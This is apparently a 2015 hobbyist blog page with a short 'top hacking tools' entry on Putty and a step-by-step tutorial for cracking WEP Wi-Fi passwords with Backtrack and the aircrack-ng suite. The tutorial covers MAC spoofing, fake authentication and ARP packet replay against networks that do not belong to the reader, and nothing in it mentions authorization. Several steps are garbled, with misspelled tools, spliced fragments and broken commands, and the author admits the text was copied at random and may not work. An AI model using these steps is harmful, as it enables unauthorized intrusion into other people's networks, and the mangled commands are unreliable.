Pages

Friday, July 10, 2015

Top 10 Hacking tools Hackers must have!!!

A hacking tool is a program designed to assist with hacking, or a piece of software which can be used for hacking purposes.

Examples include Nmap, Nessus, John the Ripper, SuperScan, p0f, and Winzapper.[1] Bribes have also been described as among the most potent hacking tools, due to their potential exploitation in social engineering attacks.[2] Occasionally, common software such as ActiveX is exploited as a hacking tool as well.

Source: Wikipedia
10. Putty

Although putty is not a hacking software by itself, it is a very useful tool for a hacker. It is a client for SSH and telnet, which can be used to connect to remote computers. You may use putty when you want to connect to your Backtrack machine from your Windows PC.  It can also be used to perform SSH tunneling to bypass firewalls.

Tuesday, July 7, 2015

How To Crack Wi-Fi Password


Step 1:- First Download Backtrack from the following link: backtrack v5 R3 backtrack v3 R1 backtrack v5 R2 backtrack v4 final backtrack v3 final

Step 2:- Burn the iso image on CD and boot your laptop from CD drive

Step 3:- Select the third boot option(VESA/KDE).

Step 4:- Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.

Step 5:- Type the following command.. airmon-ng Note down the interface name. In this example wifi0

Step 6:- airmon-ng stop wifi0

Step 7:- ifconfig wifi0 down

Step 8:- macchanger --mac 00:11:22:33:44:66 wifi0


Step 9:- airmon-ng start wifi0

Step 10:- airodump-ng wifi0 This will start populating Wifi networks. Press Ctrl + C to stop. Check the network with WEP encryption.. Notedown BSSID, CH and ESSID somewhere in notepad or paper.. Note that if the same BSSID is available in the second part with STATION associated with it, means you some one is accessing that network and our task will be little easier. If not than don’t worry we will still crack it..

Step 11:- airodump-ng -c (channel) -w (file name) Replace (channel) with the CH which u had already n (file name) with any name of your choice (bssid) with the BSSID..which u had already note --bssid (bssid) wifi0 Note it..Leave this console as it is and start new konsole

Step 12:- aireplay-ng -1 0 -a (bssid) - h00:11:22:33:44:66 wifi0 If you don’t get Association Successful mesage then keep on trying until you got success

Step 13:- wireplay-ng -3 -b (bssid)-h 00:11:22:33:44:66 wifi0 Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network..But don’t worry you go an optional step, Leave this console as it is and start new k


Step 14:- aireplay-ng -2 –p 0841 – c FF:FF:FF:FF:FF:FF konsole message than keep on trying until you get success got an optional step konsole –b (bssid) –h 00:11:22:33:44:66 wfi0 Press y and enter Now you will see that ARP and ACK packets in 2nd console are increasing fast Keep this console as it is and start 4th console.


Step 15:- aircrack-ng -b (bssid) (filename)- Just wait and watch…..Backtrack will do rest of the work.. Hurray we got the key.. Done..!!

Note => This Tuotorial Is Taken And Collected Randomly, I'm Not Sure That It Is Working Or Not Must Share & Thanx For Visiting My Blog


Keep Visiting :

Contact Form

Name

Email *

Message *

Widgets